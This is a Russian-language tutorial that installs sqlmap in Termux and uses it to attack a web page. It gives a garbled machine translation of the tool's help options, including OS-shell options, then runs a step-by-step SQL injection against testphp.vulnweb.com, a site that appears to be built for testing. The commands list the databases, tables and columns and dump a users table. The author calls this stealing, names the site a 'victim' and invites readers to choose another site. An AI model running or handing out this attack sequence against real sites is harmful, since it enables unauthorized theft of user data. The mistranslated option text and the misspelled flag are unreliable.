Данная статья не призывает к каким-либо противоправным действиям, а изложена исключительно в ознакомительных и развлекательных целях.
Итак начнем
Для этого нам опять понадобится Termux(Он есть даже в Play Market)
Заходим
Итак, а теперь пишем команды:
pkg upgrade
pkg update
pkg install git
pkg install python
pkg install wget
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python sqlmap.py
Видим это:
Если вы умеете читать по английски, то вы увидите, что ета хрень просит ввести параметры
А какие параметры:
Все параметры можно посмотреть вписывая команду
python sqlmap.py - h
Нам выйдет вот это:
И для тех, кто не знает английский
Опции:
-h, --help показать основное сообщение справки и выйти
-hh показать расширенное сообщение справки и выйти
--номер версии шоу-программы и выход из нее
-v уровень детальной детализации: 0-6 (по умолчанию 1)
Цель:
По крайней мере один из этих вариантов должен быть предоставлен для определения
цель(ы)
-url у, --URL-адрес=URL-адрес целевого URL-адреса (например, "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK обрабатывает результаты Google dork в качестве целевых URL-адресов
Запрос:
Эти параметры можно использовать для указания способа подключения к целевому URL-адресу
--data=data строка данных, которая будет отправлена по почте (например, " id=1")
--cookie=COOKIE HTTP значение заголовка Cookie (например, " PHPSESSID=a8d127e..")
--случайный агент используйте случайно выбранное значение заголовка HTTP User-Agent
--прокси=прокси-Использовать прокси для подключения к целевому URL-адресу
--tor использует анонимную сеть Tor
--проверить-Тор проверить, чтобы увидеть, если Тор используется должным образом
Инъекция:
Эти параметры можно использовать для определения того, какие параметры следует тестировать,
обеспечьте пользовательские полезные нагрузки впрыска и дополнительные сценарии фальсификации
-p TESTPARAMETER тестируемый параметр (ы)
--СУБД=СУБД принудительно приводит бэк-энд СУБД к заданному значению
Обнаружение:
Эти параметры можно использовать для настройки фазы обнаружения
--level=уровень выполняемых тестов (1-5, по умолчанию 1)
--риск=риск выполнения тестов (1-3, по умолчанию 1)
Методы:
Эти параметры можно использовать для настройки тестирования конкретной SQL-инъекции
методы
-- техника=техника.. Используемые методы SQL-инъекции (по умолчанию " BEUSTQ")
Перечисление:
Эти параметры можно использовать для перечисления внутренней базы данных
информация, структура и данные системы управления, содержащиеся в
таблицы
- а-а, --все забирают все
-b, --banner извлечение баннера СУБД
--текущий пользователь извлекает СУБД текущего пользователя
--current-db извлечение текущей базы данных СУБД
-- пароли перечисляют хэши паролей пользователей СУБД
--таблицы перечисляют таблицы базы данных СУБД
--столбцы перечисляют столбцы таблицы базы данных СУБД
--схема перечисления схемы СУБД
--дамп дамп СУБД записи таблицы базы данных
--дамп-все дамп все записи таблиц баз данных СУБД
-D DB база данных СУБД для перечисления
-T TBL СУБД таблица(ы) базы данных для перечисления
-C COL СУБД таблица базы данных столбец (ы) для перечисления
Доступ к операционной системе:
Эти параметры можно использовать для доступа к серверному управлению базами данных
система, лежащая в основе операционной системы
-- подсказка os-shell для интерактивной оболочки операционной системы
-- запрос os-pwn для оболочки OOB, Meterpreter или VNC
Общие:
Эти параметры можно использовать для установки некоторых общих рабочих параметров
-- пакет никогда не запрашивает пользовательский ввод, используйте поведение по умолчанию
--flush-session файлы сеансов Flush для текущей цели
Разнообразный:
Эти параметры не вписываются ни в какую другую категорию
--sqlmap-подсказка оболочки для интерактивной оболочки sqlmap
--мастер простой интерфейс мастера для начинающих пользователей
[!] чтобы увидеть полный список опций, запускаемых с помощью '- hh'
СОГЛАСЕН ВЫГЛЯДИТ СТРАШНО НО
Сейчас вы поймёте, что к чему
ИТАК Я БУДУ ВЗЛАМЫВАТЬ САЙТ ПРЯМО СЕЙЧАС, ЧТОБЫ ПОКАЗАТЬ НАГЛЯДНО
выберу жертву (какая попадётся)
http://testphp.vulnweb.com/listproducts.php?cat=1 (можете выбрать другой сайт)
уязвимо для атаки
Итак прописываем
python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
Итак мы можем увидеть все базы данных
В моем случае это:
Дальше, чтоб в неё попасть прописываю:
python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
Вот таблица базы
Дальше, чтоб попасть в саму базу данных мы пишем ту, что хотим (и есть в таблице)
Я хочу украсть юзеров так что прописываю
python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --colums
И последняя команда, (пиздим базу данных, делаем дамп, как хотите)
python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump
Всё!!! Поздравляю, БД спизжена!!!
Надеюсь вам понравилась статья)